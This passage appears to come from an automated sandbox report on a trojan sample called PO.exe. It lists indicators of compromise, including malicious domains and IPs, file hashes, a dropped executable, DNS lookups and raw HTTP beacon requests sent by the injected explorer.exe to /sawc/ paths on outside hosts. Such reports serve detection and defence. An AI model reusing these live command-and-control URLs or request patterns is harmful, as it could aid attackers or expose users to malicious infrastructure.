          http://www.mitraberdaya.com/sawc/?nN60m=ZLBYf+dvKraj5xhFECL+Ta+rlTPSnPltnvpHOwD/x7pMqcIuVlTqLuPQwCL73z9ijdq8&lf=CZ6X | true | Avira URL Cloud: safe | unknown
          http://www.wwwflixxy.com/sawc/?nN60m=oHoe0+b7kBAmda/0Hio/bDRlPufoMqcyuQMuAHeH1TSMS98bQSjEeWPHvQ043L9SYNbL&lf=CZ6X | true | Avira URL Cloud: safe | unknown
          http://www.sidepiecebags.com/sawc/?lf=CZ6X&nN60m=tBYTJLloxChiPW5nd8ZkTRTjZAEjhK8ruaBpTwz2qB9ROPU5gMN3GO43/2+iRXsYUADi | false | Avira URL Cloud: safe | unknown
          www.retro-e-scooter.com/sawc/ | true | Avira URL Cloud: safe | low


                                                Contacted IPs

                                                Public

                                                IP | Domain | Country | ASN | ASN Name | Malicious
                                                172.120.90.239 | www.adanahabernet.com | United States | 18779 | EGIHOSTINGUS | true
                                                35.246.6.109 | td-balancer-euw2-6-109.wixdns.net | United States | 15169 | GOOGLEUS | false
                                                5.181.216.112 | mitraberdaya.com | Germany | 59637 | ASRSINETRU | true
                                                88.198.220.232 | www.marienish.com | Germany | 24940 | HETZNER-ASDE | true
                                                81.17.18.197 | www.wwwflixxy.com | Switzerland | 51852 | PLI-ASCH | true

                                                General Information

                                                Joe Sandbox Version: 31.0.0 Emerald
                                                Analysis ID: 385455
                                                Start date: 12.04.2021
                                                Start time: 14:41:38
                                                Joe Sandbox Product: CloudBasic
                                                Overall analysis duration: 0h 10m 42s
                                                Hypervisor based Inspection enabled: false
                                                Report type: full
                                                Sample file name: PO.exe
                                                Cookbook file name: default.jbs
                                                Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed: 23
                                                Number of new started drivers analysed: 0
                                                Number of existing processes analysed: 0
                                                Number of existing drivers analysed: 0
                                                Number of injected processes analysed: 1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode: default
                                                Analysis stop reason: Timeout
                                                Detection: MAL
                                                Classification: mal100.troj.evad.winEXE@7/2@7/5
                                                EGA Information: Failed
                                                HDC Information:
                                                • Successful, ratio: 10.5% (good quality ratio 9.3%)
                                                • Quality average: 71.8%
                                                • Quality standard deviation: 32.3%
                                                HCA Information:
                                                • Successful, ratio: 98%
                                                • Number of executed functions: 100
                                                • Number of non-executed functions: 171
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 13.64.90.137, 131.253.33.200, 13.107.22.200, 20.82.210.154, 92.122.145.220, 52.255.188.83, 172.217.168.68, 104.43.193.48, 20.50.102.62, 92.122.213.194, 92.122.213.247, 52.155.217.156, 2.20.142.210, 2.20.142.209, 13.88.21.125, 20.54.26.129, 104.42.151.234, 204.79.197.200, 13.107.21.200, 168.61.161.212
                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, www.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, dual-a-0001.a-msedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                Simulations

                                                Behavior and APIs

                                                Time | Type | Description
                                                14:42:36 | API Interceptor | 205x Sleep call for process: PO.exe modified

                                                Joe Sandbox View / Context

                                                IPs


                                                Domains

                                                No context

                                                ASN


                                                JA3 Fingerprints

                                                No context

                                                Dropped Files


                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO.exe.log
                                                                                        Process:C:\Users\user\Desktop\PO.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1402
                                                                                        Entropy (8bit):5.338819835253785
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4x84bE4K5AE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKoesXE8:MIHK5HKXE1qHxvbHK5AHKzvRYHKhQnoe
                                                                                        MD5:1B32E71ED0326337C6593D13A55E54F4
                                                                                        SHA1:0452CD9E26B6C35A3D186FD6DDB1B3365AFDB16C
                                                                                        SHA-256:047E61E1F57F4922CA346203710E828859BB61800D9A72C2E64092EBB218CCA8
                                                                                        SHA-512:1B5BF6D43F14FFEC6A58366222F606CB9EA1781E9E4A7E6F340E9982DD82F296ACA693EA94105F78705C01D254A7B7897050C7289CC942122C7B83221CC15DAA
                                                                                        Malicious:true
                                                                                        Reputation:low
                                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Co
                                                                                        C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                        Process:C:\Users\user\Desktop\PO.exe
                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):42080
                                                                                        Entropy (8bit):6.2125074198825105
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
                                                                                        MD5:F2A47587431C466535F3C3D3427724BE
                                                                                        SHA1:90DF719241CE04828F0DD4D31D683F84790515FF
                                                                                        SHA-256:23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
                                                                                        SHA-512:E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Metadefender, Detection: 0%
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: Payment Advice.jpg.exe, Detection: malicious
                                                                                        • Filename: PO.exe, Detection: malicious
                                                                                        • Filename: PO_6620200947535257661_Arabico.PDF.exe, Detection: malicious
                                                                                        • Filename: Khay11iwV6.exe, Detection: malicious
                                                                                        • Filename: OrderRequest29032021_BituChemLtd.exe, Detection: malicious
                                                                                        • Filename: CL746713-6231150.exe, Detection: malicious
                                                                                        • Filename: QG8y26K6ef.exe, Detection: malicious
                                                                                        • Filename: DOC8743340924789.exe, Detection: malicious
                                                                                        • Filename: PO_6620200947535257659_Arabico.PDF.exe, Detection: malicious
                                                                                        • Filename: DARWISH TRADING PROFILE copy.exe, Detection: malicious
                                                                                        • Filename: RFQ_38463846393646388368364834.exe, Detection: malicious
                                                                                        • Filename: Company profile.exe, Detection: malicious
                                                                                        • Filename: PO.exe, Detection: malicious
                                                                                        • Filename: Doc_3847468364836483638463,pdf.exe, Detection: malicious
                                                                                        • Filename: J3RZHj0FIu.exe, Detection: malicious
                                                                                        • Filename: SecuriteInfo.com.Trojan.PWS.Siggen2.61833.4196.exe, Detection: malicious
                                                                                        • Filename: SecuriteInfo.com.Trojan.PWS.Siggen2.61912.12941.exe, Detection: malicious
                                                                                        • Filename: Done.exe, Detection: malicious
                                                                                        • Filename: SecuriteInfo.com.Trojan.GenericKD.45865428.31596.exe, Detection: malicious
                                                                                        • Filename: Shipping _doc_pdf scan 0094775885895.exe, Detection: malicious
                                                                                        Reputation:moderate, very likely benign file

                                                                                        Static File Info

                                                                                        General

                                                                                        File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit): 6.76217978174977
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        File name: PO.exe
                                                                                        File size: 542208
                                                                                        MD5: 4bb710142c4fa183e24dbd3ce3c7b51d
                                                                                        SHA1: 64a659096deda60c37861ddc0d26d3bfb11cc0c7
                                                                                        SHA256: 4903d25c490e1b6c899c4fb9d3d3eb16d79c802245d4c2b667ff06f42724e358
                                                                                        SHA512: 7b157763a01bcfba0a66d026af138209a2b3fccd955e789158d39a5e4738491f8146c1894aceabae42e7e064b02314f098ea52351dcbd2f66feed2b8ee6acc35
                                                                                        SSDEEP: 12288:laRZszqqB3PQhPp5owXoJSq5Qbxn09z2Oe:tzqIgfobC909S

                                                                                        File Icon

                                                                                        Icon Hash: 00828e8e8686b000

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint: 0x4858ee
                                                                                        Entrypoint Section: .text
                                                                                        Digitally signed: false
                                                                                        Imagebase: 0x400000
                                                                                        Subsystem: windows gui
                                                                                        Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                        DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                        Time Stamp: 0x13C6926D [Mon Jul 7 01:18:37 1980 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version: v4.0.30319
                                                                                        OS Version Major: 4
                                                                                        OS Version Minor: 0
                                                                                        File Version Major: 4
                                                                                        File Version Minor: 0
                                                                                        Subsystem Version Major: 4
                                                                                        Subsystem Version Minor: 0
                                                                                        Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT          0x858a0          0x4b          .text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE        0x86000          0x612         .rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC       0x88000          0xc           .reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                        Sections

                                                                                        Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                                                                        .text   0x2000           0x838f4       0x83a00   False     0.643192070275   data       6.77669868061   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc   0x86000          0x612         0x800     False     0.349609375      data       3.63882954088   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc  0x88000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        Name         RVA      Size   Type                                                                         Language  Country
                                                                                        RT_VERSION   0x860a0  0x388  data
                                                                                        RT_MANIFEST  0x86428  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                        Imports

                                                                                        DLL          Import
                                                                                        mscoree.dll  _CorExeMain

                                                                                        Version Infos

                                                                                        Description       Data
                                                                                        Translation       0x0000 0x04b0
                                                                                        LegalCopyright    Copyright 2018 =B3E94;GD4HDE2>7?E=?9<IG
                                                                                        Assembly Version  1.0.0.0
                                                                                        InternalName      PO.exe
                                                                                        FileVersion       9.14.18.23
                                                                                        CompanyName       =B3E94;GD4HDE2>7?E=?9<IG
                                                                                        Comments          @5<?5677JAJ46=E=
                                                                                        ProductName       44J43IA<E7EF<:<J4
                                                                                        ProductVersion    9.14.18.23
                                                                                        FileDescription   44J43IA<E7EF<:<J4
                                                                                        OriginalFilename  PO.exe

                                                                                        Network Behavior

                                                                                        Network Port Distribution

                                                                                        TCP Packets


                                                                                        UDP Packets

                                                                                        Apr 12, 2021 14:43:16.507122040 CEST53565348.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:43:17.066649914 CEST5662753192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:43:17.121779919 CEST53566278.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:43:17.383078098 CEST5662153192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:43:17.450237989 CEST53566218.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:43:17.815967083 CEST6311653192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:43:17.873720884 CEST53631168.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:43:18.535752058 CEST6407853192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:43:18.593535900 CEST53640788.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:43:19.386559963 CEST6480153192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:43:19.443630934 CEST53648018.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:43:20.553845882 CEST6172153192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:43:20.604923964 CEST53617218.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:43:21.973670006 CEST5125553192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:43:22.033448935 CEST53512558.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:43:22.902383089 CEST6152253192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:43:22.957165956 CEST53615228.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:43:30.012734890 CEST5233753192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:43:30.071494102 CEST53523378.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:43:41.008186102 CEST5504653192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:43:41.057065010 CEST53550468.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:43:49.759149075 CEST4961253192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:43:49.807861090 CEST53496128.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:43:57.420022011 CEST4928553192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:43:57.471882105 CEST53492858.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:43:58.524750948 CEST5060153192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:43:58.576957941 CEST53506018.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:43:59.734992027 CEST6087553192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:43:59.788009882 CEST53608758.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:44:00.816592932 CEST5644853192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:44:00.884073973 CEST53564488.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:44:01.390639067 CEST5917253192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:44:01.439263105 CEST53591728.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:44:01.632924080 CEST6242053192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:44:01.708024025 CEST53624208.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:44:04.046782017 CEST6057953192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:44:04.095602989 CEST53605798.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:44:06.877645969 CEST5018353192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:44:06.964396000 CEST53501838.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:44:07.563872099 CEST6153153192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:44:07.612555981 CEST53615318.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:44:08.601608992 CEST4922853192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:44:08.650274992 CEST53492288.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:44:09.655905008 CEST5979453192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:44:09.706682920 CEST53597948.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:44:12.095752001 CEST5591653192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:44:12.318901062 CEST53559168.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:44:17.759136915 CEST5275253192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:44:17.845458031 CEST53527528.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:44:22.862821102 CEST6054253192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:44:22.946855068 CEST53605428.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:44:28.138525009 CEST6068953192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:44:28.536580086 CEST53606898.8.8.8192.168.2.4
                                                                                        Apr 12, 2021 14:44:34.270891905 CEST6420653192.168.2.48.8.8.8
                                                                                        Apr 12, 2021 14:44:34.368071079 CEST53642068.8.8.8192.168.2.4

                                                                                        DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 12, 2021 14:44:01.632924080 CEST | 192.168.2.4 | 8.8.8.8 | 0x8f05 | Standard query (0) | www.marienish.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:44:06.877645969 CEST | 192.168.2.4 | 8.8.8.8 | 0xbff7 | Standard query (0) | www.wwwflixxy.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:44:12.095752001 CEST | 192.168.2.4 | 8.8.8.8 | 0xb138 | Standard query (0) | www.adanahabernet.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:44:17.759136915 CEST | 192.168.2.4 | 8.8.8.8 | 0x2340 | Standard query (0) | www.swpszx.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:44:22.862821102 CEST | 192.168.2.4 | 8.8.8.8 | 0x617e | Standard query (0) | www.sidepiecebags.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:44:28.138525009 CEST | 192.168.2.4 | 8.8.8.8 | 0x376e | Standard query (0) | www.mitraberdaya.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:44:34.270891905 CEST | 192.168.2.4 | 8.8.8.8 | 0x6ec8 | Standard query (0) | www.oaisdjoqwekxc.info | A (IP address) | IN (0x0001)

                                                                                        DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 12, 2021 14:44:01.708024025 CEST | 8.8.8.8 | 192.168.2.4 | 0x8f05 | No error (0) | www.marienish.com | | 88.198.220.232 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:44:06.964396000 CEST | 8.8.8.8 | 192.168.2.4 | 0xbff7 | No error (0) | www.wwwflixxy.com | | 81.17.18.197 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:44:12.318901062 CEST | 8.8.8.8 | 192.168.2.4 | 0xb138 | No error (0) | www.adanahabernet.com | | 172.120.90.239 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:44:17.845458031 CEST | 8.8.8.8 | 192.168.2.4 | 0x2340 | Name error (3) | www.swpszx.com | none | none | A (IP address) | IN (0x0001)
Apr 12, 2021 14:44:22.946855068 CEST | 8.8.8.8 | 192.168.2.4 | 0x617e | No error (0) | www.sidepiecebags.com | www10.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 14:44:22.946855068 CEST | 8.8.8.8 | 192.168.2.4 | 0x617e | No error (0) | www10.wixdns.net | balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 14:44:22.946855068 CEST | 8.8.8.8 | 192.168.2.4 | 0x617e | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 14:44:22.946855068 CEST | 8.8.8.8 | 192.168.2.4 | 0x617e | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-euw2-6-109.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 14:44:22.946855068 CEST | 8.8.8.8 | 192.168.2.4 | 0x617e | No error (0) | td-balancer-euw2-6-109.wixdns.net | | 35.246.6.109 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:44:28.536580086 CEST | 8.8.8.8 | 192.168.2.4 | 0x376e | No error (0) | www.mitraberdaya.com | mitraberdaya.com | | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 14:44:28.536580086 CEST | 8.8.8.8 | 192.168.2.4 | 0x376e | No error (0) | mitraberdaya.com | | 5.181.216.112 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:44:34.368071079 CEST | 8.8.8.8 | 192.168.2.4 | 0x6ec8 | Name error (3) | www.oaisdjoqwekxc.info | none | none | A (IP address) | IN (0x0001)

                                                                                        HTTP Request Dependency Graph

                                                                                        • www.marienish.com
                                                                                        • www.wwwflixxy.com
                                                                                        • www.adanahabernet.com
                                                                                        • www.sidepiecebags.com
                                                                                        • www.mitraberdaya.com

                                                                                        HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49757 | 88.198.220.232 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 14:44:01.792294979 CEST | 6356 | OUT | GET /sawc/?lf=CZ6X&nN60m=Yt32z530e2tITcOEW5SVHb5yrIELojDg7+FgI5/ZTK76GuoPLgYuVmd8rLeapbOqeXRQ HTTP/1.1
                                                                                        Host: www.marienish.com
                                                                                        Connection: close
                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                        Data Ascii:
Apr 12, 2021 14:44:01.859483957 CEST | 6356 | IN | HTTP/1.1 301 Moved Permanently
                                                                                        Date: Mon, 12 Apr 2021 12:44:01 GMT
                                                                                        Server: Apache
                                                                                        Location: https://www.marienish.com/sawc/?lf=CZ6X&nN60m=Yt32z530e2tITcOEW5SVHb5yrIELojDg7+FgI5/ZTK76GuoPLgYuVmd8rLeapbOqeXRQ
                                                                                        Content-Length: 393
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.marienish.com/sawc/?lf=CZ6X&amp;nN60m=Yt32z530e2tITcOEW5SVHb5yrIELojDg7+FgI5/ZTK76GuoPLgYuVmd8rLeapbOqeXRQ">here</a>.</p><hr><address>Apache Server at www.marienish.com Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49759 | 81.17.18.197 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 14:44:07.017080069 CEST | 6368 | OUT | GET /sawc/?nN60m=oHoe0+b7kBAmda/0Hio/bDRlPufoMqcyuQMuAHeH1TSMS98bQSjEeWPHvQ043L9SYNbL&lf=CZ6X HTTP/1.1
                                                                                        Host: www.wwwflixxy.com
                                                                                        Connection: close
                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                        Data Ascii:
Apr 12, 2021 14:44:07.083889961 CEST | 6369 | IN | HTTP/1.1 200 OK
                                                                                        cache-control: max-age=0, private, must-revalidate
                                                                                        connection: close
                                                                                        content-length: 565
                                                                                        content-type: text/html; charset=utf-8
                                                                                        date: Mon, 12 Apr 2021 12:44:06 GMT
                                                                                        server: nginx
                                                                                        set-cookie: sid=c52b47e4-9b8c-11eb-89fd-2dd5e54b280f; path=/; domain=.wwwflixxy.com; expires=Sat, 30 Apr 2089 15:58:14 GMT; max-age=2147483647; HttpOnly
                                                                                        Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.wwwflixxy.com/sawc/?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYxODIzODY0NywiaWF0IjoxNjE4MjMxNDQ3LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycHFocHJiNzJxdjBwZ3Y3ZnMxOWFlNmYiLCJuYmYiOjE2MTgyMzE0NDcsInRzIjoxNjE4MjMxNDQ3MDcxODQ0fQ.dlrQjvsgyfZ80BozsQCrj-SwGO9qlj_XUTlN44RA5K4&lf=CZ6X&nN60m=oHoe0+b7kBAmda%2F0Hio%2FbDRlPufoMqcyuQMuAHeH1TSMS98bQSjEeWPHvQ043L9SYNbL&sid=c52b47e4-9b8c-11eb-89fd-2dd5e54b280f');</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49763 | 172.120.90.239 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 14:44:12.523111105 CEST | 6408 | OUT | GET /sawc/?lf=CZ6X&nN60m=LtE+xZw49qZxNGHwe/5duJoxTMG7p0RZVZ9/xidjWtVQjRXR0IRVZ3163NMz7MOSj/bw HTTP/1.1
                                                                                        Host: www.adanahabernet.com
                                                                                        Connection: close
                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                        Data Ascii:
Apr 12, 2021 14:44:12.727207899 CEST | 6409 | IN | HTTP/1.1 200 OK
                                                                                        Transfer-Encoding: chunked
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                        X-Powered-By: Nginx
                                                                                        Date: Mon, 12 Apr 2021 12:44:11 GMT
                                                                                        Connection: close
                                                                                        Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                        Data Ascii: 3


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49764 | 35.246.6.109 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 14:44:23.013834000 CEST | 6415 | OUT | GET /sawc/?lf=CZ6X&nN60m=tBYTJLloxChiPW5nd8ZkTRTjZAEjhK8ruaBpTwz2qB9ROPU5gMN3GO43/2+iRXsYUADi HTTP/1.1
